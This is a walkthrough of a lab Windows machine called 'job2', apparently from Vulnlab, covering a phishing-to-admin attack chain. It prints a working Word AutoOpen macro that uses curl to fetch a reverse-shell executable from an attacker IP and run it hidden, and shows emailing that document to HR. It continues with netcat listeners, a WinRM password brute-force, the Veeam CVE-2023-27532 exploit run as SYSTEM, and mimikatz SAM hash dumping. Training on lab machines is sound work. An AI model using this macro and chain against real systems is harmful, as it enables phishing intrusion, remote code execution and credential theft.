job2 a hard windows machine , from phising to admin


1. Enable Developer Tools in the Ribbon Menu to gain access to macros
2. Name your Macro AutoOpen() if you are working with Word 2016+
3. Select the Current Document as the place to store the Macro
4. Don’t use .docx as the file extension since it won’t allow for embedded macros. Either use .doc or .docm

Do the testing on your lan 1st ( a kali box and a windows11 pc )

i used this macro

Sub AutoOpen()

  a = Shell("""curl"" """" ""-o"" ""C:\Windows\tasks\rcat_192.168.1.41_443.exe""", vbHide)
  b = Shell("C:\Windows\tasks\rcat_192.168.1.41_443.exe", vbHide)

End Sub

Open the puck3.docm 2 times, 1st to download rcat, and 2nd time to execute rcat.exe

If you receive a reverse shell , start the job2 box , to get the job2

Here we go …

We start with a nmap scan

Starting Nmap 7.93 ( ) at 2024-07-11 10:58 CEST
Stats: 0:00:47 elapsed; 0 hosts completed (1 up), 1 undergoing Script Scan
NSE Timing: About 99.93% done; ETC: 10:59 (0:00:00 remaining)
Stats: 0:01:01 elapsed; 0 hosts completed (1 up), 1 undergoing Script Scan
NSE Timing: About 85.00% done; ETC: 11:00 (0:00:00 remaining)
Nmap scan report for job2.vl (
Host is up (0.019s latency).
Not shown: 989 filtered tcp ports (no-response)
22/tcp   open  ssh           OpenSSH for_Windows_8.1 (protocol 2.0)
| ssh-hostkey: 
|   3072 a39477ca160eecfb238667c60ae3ca7b (RSA)
|   256 0e2a317094995d95d4f840d5b5368e88 (ECDSA)
|_  256 29312ac355b2f773f2d3bdbcc5c114f0 (ED25519)
25/tcp   open  smtp          hMailServer smtpd
| smtp-commands: JOB2, SIZE 20480000, AUTH LOGIN, HELP
80/tcp   open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
111/tcp  open  rpcbind
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
443/tcp  open  ssl/http      Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
| tls-alpn: 
|_  http/1.1
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=www.job2.vl
| Subject Alternative Name: DNS:job2.vl, DNS:www.job2.vl
| Not valid before: 2023-05-09T13:31:40
|_Not valid after:  2122-05-09T13:41:37
|_http-title: Not Found
445/tcp  open  microsoft-ds?
1063/tcp open  rpcbind
2049/tcp open  rpcbind
3389/tcp open  ms-wbt-server Microsoft Terminal Services
|_ssl-date: 2024-07-11T08:59:58+00:00; 0s from scanner time.
| ssl-cert: Subject: commonName=JOB2
| Not valid before: 2024-07-10T08:57:44
|_Not valid after:  2025-01-09T08:57:44
Service Info: Host: JOB2; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-security-mode: 
|   311: 
|_    Message signing enabled but not required
| smb2-time: 
|   date: 2024-07-11T08:59:22
|_  start_date: N/A

Service detection performed. Please report any incorrect results at .
Nmap done: 1 IP address (1 host up) scanned in 69.18 seconds

We examine  a website, and find out how to apply for the job2

Send your CV 2 times ( of course 1st modify your test ip on lan to your tun0 ip of the vulnhub vpn. in the macro of puck3.docm

└─$ sendemail -s job2.vl -f "puck <>" -t hr@job2.vl -o tls=no -m "hey pls check my cv" -a puck3.docm 

Jun 30 15:53:21 kali sendemail[35338]: Email was sent successfully!

Catch the shell

└─$ python3 -m http.server 80
Serving HTTP on port 80 ( ... - - [11/Jul/2024 11:06:23] "GET /rcat.exe HTTP/1.1" 200 -


└─$ rlwrap nc -nlvp 443
listening on [any] 443 ...
connect to [] from (UNKNOWN) [] 50302
Microsoft Windows [Version 10.0.20348.1668]
(c) Microsoft Corporation. All rights reserved.

C:\Windows\system32>whoami /priv


Privilege Name                Description                    State   
============================= ============================== ========
SeChangeNotifyPrivilege       Bypass traverse checking       Enabled 
SeIncreaseWorkingSetPrivilege Increase a process working set Disabled


C:\Windows\system32>net users

User accounts for \\JOB2

Administrator            DefaultAccount           Ferdinand                
Guest                    Julian                   svc_veeam                
The command completed successfully.


Next I did a brute-force

└─$ crackmapexec winrm -u Ferdinand -p /usr/share/wordlists/rockyou.txt

SMB   5985   JOB2             [*] Windows Server 2022 Build 20348 (name:JOB2) (domain:JOB2)
HTTP   5985   JOB2             [*]
WINRM   5985   JOB2             [-] JOB2\Ferdinand:123456
WINRM   5985   JOB2             [-] JOB2\Ferdinand:12345
WINRM   5985   JOB2             [-] JOB2\Ferdinand:123456789
WINRM   5985   JOB2             [-] JOB2\Ferdinand:password
WINRM   5985   JOB2             [-] JOB2\Ferdinand:iloveyou

and it found Ferdinand’s pass

next evil-winrm to the box, and find VEEAM Backup installed

and used CVE-2023-27532-RCE-Only , to finish JOB2

└─$ evil-winrm -u Ferdinand -p Fr<REDACTED>! -i
Evil-WinRM shell v3.5
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM GitHub:
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Ferdinand\Documents> netstat -ano | findstr /s 9401
  TCP               LISTENING       2132
*Evil-WinRM* PS C:\Users\Ferdinand\Documents> 


*Evil-WinRM* PS C:\temp> upload Veeam.Backup.Interaction.MountService.dll
Info: Uploading /home/puck/vulnlab/job2/Veeam.Backup.Interaction.MountService.dll to C:\temp\Veeam.Backup.Interaction.MountService.dll
Data: 573544 bytes of 573544 bytes copied
Info: Upload successful!
*Evil-WinRM* PS C:\temp> upload veeam.backup.model.dll
Info: Uploading /home/puck/vulnlab/job2/veeam.backup.model.dll to C:\temp\veeam.backup.model.dll
Data: 5925652 bytes of 5925652 bytes copied
Info: Upload successful!
*Evil-WinRM* PS C:\temp> .\VeeamHax.exe --target --cmd c:\temp\rcat_10.8.2.138_443.exe

and catch the admin shell

└─$ rlwrap nc -nlvp 443
listening on [any] 443 ...
connect to [] from (UNKNOWN) [] 56039
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.

Install the latest PowerShell for new features and improvements!

PS C:\Windows\system32> whoami
nt authority\system

PS C:\users\Administrator\Desktop> dir

    Directory: C:\users\Administrator\Desktop

Mode                 LastWriteTime         Length Name                                                                 
----                 -------------         ------ ----                                                                 
-a----          5/3/2023   2:04 PM           1029 LINQPad 5.lnk                                                        
-a----          5/3/2023   4:00 PM             36 root.txt                                                             

PS C:\users\Administrator\Desktop> type root.txt
type root.txt
PS C:\users\Administrator\Desktop>


That’s all.

Beyond root

mimikatz # privilege::debug
Privilege '20' OK

mimikatz # lsadump::sam
Domain : JOB2
SysKey : fb3d0b6fd4b888fb0bb4d3a6ba00dcd5
ERROR kull_m_registry_OpenAndQueryWithAlloc ; kull_m_registry_RegOpenKeyEx KO
ERROR kuhl_m_lsadump_getUsersAndSamKey ; kull_m_registry_RegOpenKeyEx SAM Accounts (0x00000005)

mimikatz # token::elevate
Token Id  : 0
User name :

764     {0;000003e7} 1 D 29290          NT AUTHORITY\SYSTEM     S-1-5-18        (04g,21p)       Primary
 -> Impersonated !
 * Process Token : {0;01a2aee9} 3 F 35131903    JOB2\puck       S-1-5-21-3935782767-3829597994-1046841959-1004  (14g,24p)       Primary
 * Thread Token  : {0;000003e7} 1 D 37906026    NT AUTHORITY\SYSTEM     S-1-5-18        (04g,21p)       Impersonation (Delegation)

mimikatz # lsadump::sam
Domain : JOB2
SysKey : fb3d0b6fd4b888fb0bb4d3a6ba00dcd5
Local SID : S-1-5-21-3935782767-3829597994-1046841959

SAMKey : 36c26e0a457c1d613a608d104acca9e9

RID  : 000001f4 (500)
User : Administrator
  Hash NTLM: 6f2<REDACTED>04a


C:\Users\Julian\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\phishs.bat

powershell \windows\phishsim.ps1


Start-Process "C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE"

$watcher = New-Object System.IO.FileSystemWatcher
$watcher.Path = 'C:\programdata\attachments'
$watcher.EnableRaisingEvents = $true
$action =
    $name = $event.SourceEventArgs.FullPath    
    $changetype = $event.SourceEventArgs.ChangeType    
    Write-Host "$name was $changetype at $(get-date)"
        if(Test-Path $name){    
            Write-Host "Opening $name"
            Start-Process "C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE" -ArgumentList "$name"
            sleep 45
            Write-Host "Resetting.."
            Get-Process "WINWORD.EXE" | Stop-Process -Force             
            Get-Process "WINWORD" | Stop-Process -Force  
            sleep 5
            Remove-Item $name -Force
Register-ObjectEvent $watcher 'Created' -Action $action
Register-ObjectEvent $watcher 'Changed' -Action $action

    sleep 45




Posted on

Leave a Reply

Your email address will not be published. Required fields are marked *